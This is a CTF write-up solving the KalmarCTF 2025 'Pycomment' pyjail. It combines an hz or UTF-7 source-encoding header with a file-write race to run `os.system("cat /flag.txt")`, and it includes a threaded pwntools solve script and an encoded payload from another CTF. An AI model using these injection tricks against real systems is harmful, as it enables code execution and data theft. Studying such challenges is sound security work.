"Pycomment" from KalmarCTF 2025

Pycomment (misc, 2 solves)

In this writeup, I will share how I solved "Pycomment" from KalmarCTF 2025. It was one of the tougher pyjails this year and makes use of two really unique ideas.

Thanks for the challenge, @ChattyPlatinumCool 😛

Description

Can you please help us comment our code? And please don't attack us.
https://lab5.kalmarc.tf

Attachments: pycomment.zip

Challenge

In code_to_comment.py:

#!/usr/bin/env python3
# We would like to extend our sincere apologies due to the fiasco
# displayed below. As we all know, when we write python, we should
# closely follow the zen of python. Just to refresh your mind, I'll
# share the most important lines with you again:
"""
Beautiful is better than ugly.
Explicit is better than implicit.
Simple is better than complex.
Complex is better than complicated.
Flat is better than nested.
"""

# Extra safety, make sure no code is run:
quit()

def wish_printer():
    #
    wish = 'Kalmar says' + ' cheers!!'
    print(wish)

In server.py:

import string

banner = r"""
 _______         _______ _______ _______ _______ _______ _      _________
(  ____ |\     /(  ____ (  ___  (       (       (  ____ ( (    /\__   __/
| (    )( \   / | (    \| (   ) | () () | () () | (    \|  \  ( |  ) (
| (____)|\ (_) /| |     | |   | | || || | || || | (__   |   \ | |  | |
|  _____) \   / | |     | |   | | |(_)| | |(_)| |  __)  | (\ \) |  | |
| (        ) (  | |     | |   | | |   | | |   | | (     | | \   |  | |
| )        | |  | (____/| (___) | )   ( | )   ( | (____/| )  \  |  | |
|/         \_/  (_______(_______|/     \|/     \(_______|/    )_)  )_(   """.strip('\n')

print(banner + '\n\n')

print('Recently we made some budget cuts and had to let some developers go.')
print("Unfortunately, we realised too late that a large portion of our codebase is lacking comments.")
print("We've decided to crowd source the process of commenting our code.")
print("This program allows people from all over the internet to safely add comments to our codebase, so the remaining developers know what our code is doing.")

with open('code_to_comment.py', 'r') as rf:
    source = rf.read()
lines = source.split('\n')

print(f"\nHere's the code that we don't understand:\n```\n{source}\n```\n")
print("Would you be so kind to add useable comments?\n")

ALLOWED_CHARACTERS = string.ascii_letters + string.digits + string.punctuation + ' '

# Loop over lines and let user edit comments:
for i, line in enumerate(lines):
    if i == 0: # We ignore the shebang line of course
        continue
    if not line.lstrip().startswith('#'):
        continue
    print(f'Line {i} is a comment. Currently it is `{line}`. What would you like to append?')
    user_input = input('> ')
    if not all(c in ALLOWED_CHARACTERS for c in user_input):
        print('Make sure to not use any funky characters! We want readable comments!')
        continue
    new_line = line + user_input
    if len(new_line) > 72:
        print('Comment too long! Make sure to follow PEP-8!')
        continue
    lines[i] = new_line

# Write new file
new_python_file = '\n'.join(lines)
with open('commented_code.py', 'w') as wf:
    wf.write(new_python_file)

print(f"\nCommented code succesfully written to file. Here's the code:\n```\n{new_python_file}\n```\n")

# Let's make sure the file is not broken:
try:
    __import__('commented_code')
except SyntaxError as e:
    print('SyntaxError:', str(e))
    quit()

print('Yay, no errors! Thanks for commenting our code!')

Overview

We are given a server that allows us to add comments to an existing Python script (code_to_comment.py). After the lines have been written, it gets saved to a new file (commented_code.py) and then executed with __import__('commented_code').

We are only allowed to append text to lines that are already commented, which are lines 2, 3, 4, 5, 14, and 18 (excluding the shebang line).

In order to block the user from injecting malicious code, the server imposes some restrictions on the comments:

Only printable ASCII is allowed, i.e. letters, digits, punctuation and ' '.
Each line must not exceed 72 characters, so that it follows "PEP-8 guidelines".

Magic headers

At first glance, it seems impossible because anything we insert is simply ignored by the comment. However, one seasoned with the quirks of Python will know about magic headers as documented in PEP 263. Any Python file whose first or second line matches this regular expression:

^[ \t\f]*#.*?coding[:=][ \t]*([-_.a-zA-Z0-9]+)

causes the entire file to be interpreted in a custom text encoding.

For example, this trick was used in "AaaS" from MapleCTF 2023 to bypass a pyjail:

#coding=u7
+AGEAPQBfAF8AaQBtAHAAbwByAHQAXwBfACgAJwBvAHMAJwApAC4AcABvAHAAZQBuACgAJwBjAGEAdAAgAC8AYQBwAHAALwBmAGwAYQBnAC4AdAB4AHQAJwApAC4AcgBlAGEAZAAoACk

(if you decode the long string as UTF-7, it runs a shell command that reads flag.txt)

Since Line 2 of code_to_comment.py contains a comment, we can append this magic header to end of that line:

#!/usr/bin/env python3
# We would like to extend our sincere apologies due to the fiascoding=u7
...

Notice that we've combined the words fiasco and coding=u7 to shrink the line, which is perfectly valid, and ends in exactly 72 characters! If not for this massive "coincidence", this trick would not be possible.

Messing with UTF-7

So the way UTF-7 is decoded is (roughly) by looking for strings of the form +BASE64STRING-, and then decoding the base64 in between and interpreting that as UTF-16BE. The important thing to realize is that the source code is first decoded, then parsed.

Therefore, if we encode \nPAYLOAD as UTF-7 and append that to one of the lines, it should escape the comment and execute PAYLOAD when the file gets imported. We can apply this once to override the quit(), and once more to execute a breakpoint().

So, are we done? Well, it turns out that this idea doesn't exactly work, as we will encounter the following error:

'utf7' codec can't decode bytes in position 640-641: ill-formed sequence (wow.py, line 0)

We find that the third line inside this function cannot be decoded by UTF-7:

def wish_printer():
    #
    wish = 'Kalmar says' + ' cheers!!'
    print(wish)

Because of the +, the decoder tries to interpret everything following it as base64, which leads to a decoding error. As far as I am aware, there is no way to circumvent this error. I even tried digging into the source code, but to no avail.

Other encodings

Since u7 didn't seem to work, I started looking into other potential encodings. Due to the 72-character limit, the encoding name must be at most two characters long. A quick enumeration shows us that only these encodings are possible:

hz l1 l2 l3 l4 l5 l6 l7 l8 l9 r8 us u7 u8

The only other encoding that has a non-standard character mapping is hz. I could not find any documentation for how it works, but it is implemented under cjkcodecs/_codecs_cn.c#L410:

while (inleft > 0) {
    unsigned char c = INBYTE1;
    Py_UCS4 decoded;

    if (c == '~') {
        unsigned char c2 = INBYTE2;

        REQUIRE_INBUF(2);
        if (c2 == '~' && state->c[CN_STATE_OFFSET] == 0)
            OUTCHAR('~');
        else if (c2 == '{' && state->c[CN_STATE_OFFSET] == 0)
            state->c[CN_STATE_OFFSET] = 1; /* set GB */
        else if (c2 == '\n' && state->c[CN_STATE_OFFSET] == 0)
            ; /* line-continuation */
        else if (c2 == '}' && state->c[CN_STATE_OFFSET] == 1)
            state->c[CN_STATE_OFFSET] = 0; /* set ASCII */
        else
            return 1;
        NEXT_IN(2);
        continue;
    }
    ...
}

Playing around with it gives us a pretty good idea of how it works:

>>> b'~{aa~}'.decode('hz')
'後'
>>> b'~{aabb~}'.decode('hz')
'後忖'
>>> b'~{1234~}'.decode('hz')
'辈炒'
>>> b'~{1234~}hello'.decode('hz')
'辈炒hello'
>>> b'~{'.decode('hz')
'辈炒hello'

However, it only seems to encode Chinese characters, and we need to encode a newline in order to escape the comment.

But after I revisited the source code, I noticed something interesting about one of the branches:

else if (c2 == '\n' && state->c[CN_STATE_OFFSET] == 0)
    ; /* line-continuation */

This essentially causes '~\n' to decode to nothing. But this is useful! If we add ~ to the end of a line, then the next line will just get placed on the same line as the comment. And so,

# Extra safety, make sure no code is run:~
quit()

becomes

# Extra safety, make sure no code is run:quit()

So we can comment out quit(). But unfortunately, it does not allow us to insert any arbitrary payload. We would somehow need a way to combine the utility of u7 and hz...

One more trick

We actually need one more trick in order to solve this challenge, and from a pyjail perspective, it is not an obvious thing to look for. The idea stems from this part of the code:

new_python_file = '\n'.join(lines)
with open('commented_code.py', 'w') as wf:
    wf.write(new_python_file)

print(f"\nCommented code succesfully written to file. Here's the code:\n```\n{new_python_file}\n```\n")

# Let's make sure the file is not broken:
try:
    __import__('commented_code')
except SyntaxError as e:
    print('SyntaxError:', str(e))
    quit()

The Dockerfile spawns processes via socat, so multiple instances can be run concurently. Well, what happens if two instances write to commented_code.py at the same time? Will it just write one of them or does it result in a corrupted file?

We can test this out with a simple fork() script:

import os

pid = os.fork()
if pid == 0:
    with open('junk', 'w') as f:
        f.write('a' * 10)
else:
    with open('junk', 'w') as f:
        f.write('b' * 5)

    with open('junk', 'r') as f:
        print(f.read())

Most of the time it prints aaaaaaaaaa or bbbbb, but occasionally, we will get bbbbbaaaaa! So we have hit a devestating file-write race condition.

We can now use this overlap to cause extra code to execute outside of the comment. It's now just a task of finding the right offsets to align everything correctly.

For the final solution, I crafted these two files:

#!/usr/bin/env python3
# We would like to extend our sincere apologies due to the fiascoding=hz
# displayed below. As we all know, when we write python, we should
# closely follow the zen of python. Just to refresh your mind, I'll
# share the most important lines with you again:
"""
Beautiful is better than ugly.
Explicit is better than implicit.
Simple is better than complex.
Complex is better than complicated.
Flat is better than nested.
"""

# Extra safety, make sure no code is run:~
quit()

def wish_printer():
    #
    wish = 'Kalmar says' + ' cheers!!'
    print(wish)

#!/usr/bin/env python3
# We would like to extend our sincere apologies due to the fiascoAAAAAAA
# displayed below. As we all know, when we write python, we shouldAAAAAA
# closely follow the zen of python. Just to refresh your mind, I'llAAAAA
# share the most important lines with you again:AAAAAAAAAAAAAAAAAAAAAAAA
"""
Beautiful is better than ugly.
Explicit is better than implicit.
Simple is better than complex.
Complex is better than complicated.
Flat is better than nested.
"""

# Extra safety, make sure no code is run:AAAAAAAAAAAAAAAAAAAAAA
quit()

def wish_printer():
    #if __import__("os").system("cat /flag.txt"):
    wish = 'Kalmar says' + ' cheers!!'
    print(wish)

When overlapped in the right way, they produce this new file:

#!/usr/bin/env python3
# We would like to extend our sincere apologies due to the fiascoding=hz
# displayed below. As we all know, when we write python, we should
# closely follow the zen of python. Just to refresh your mind, I'll
# share the most important lines with you again:
"""
Beautiful is better than ugly.
Explicit is better than implicit.
Simple is better than complex.
Complex is better than complicated.
Flat is better than nested.
"""

# Extra safety, make sure no code is run:~
quit()

def wish_printer():
    #
    wish = 'Kalmar says' + ' cheers!!'
    print(wish)
if __import__("os").system("cat /flag.txt"):
    wish = 'Kalmar says' + ' cheers!!'
    print(wish)

Note that the coding=hz header is still necessary in order to comment out quit(), unless it is possible to cause the code that gets appended to execute before the quit() (I do not think this is possible, but let me know if you find a way!).

Solve script

from pwn import *
from threading import *

prog_a = [b'ding=hz', b'', b'', b'', b'~', b'']
prog_b = [b'A'*7, b'A'*6, b'A'*5, b'A'*24, b'A'*22, b'if __import__("os").system("cat /flag.txt"):']

def exploit(index):
    context.log_level = 'warn'
    lines = (prog_a, prog_b)[index]
    # with remote('localhost', 7531) as io:
    with remote('b01bc84d755b10a84ae212033fde623d-62103.inst5.chal-kalmarc.tf', 1337, ssl=True) as io:
        for line in lines[:-1]:
            io.sendlineafter(b'> ', line)
        io.recvuntil(b'> ')
        race_sync.wait()
        io.sendline(lines[-1])
        print(io.recvall().decode())

indices = [0, 1] * 8
race_sync = Barrier(len(indices))

for i in indices:
    Thread(target=exploit, args=(i,)).start()

For the final solve script, I spawned 16 proceses in parallel for a higher chance at hitting the race condition. The flag got dumped after 4 or so attempts:

kalmar{thanks_for_commenting_my_coding_quickly_enough_to_win_that_race}

Lydxn/pycomment_writeup.md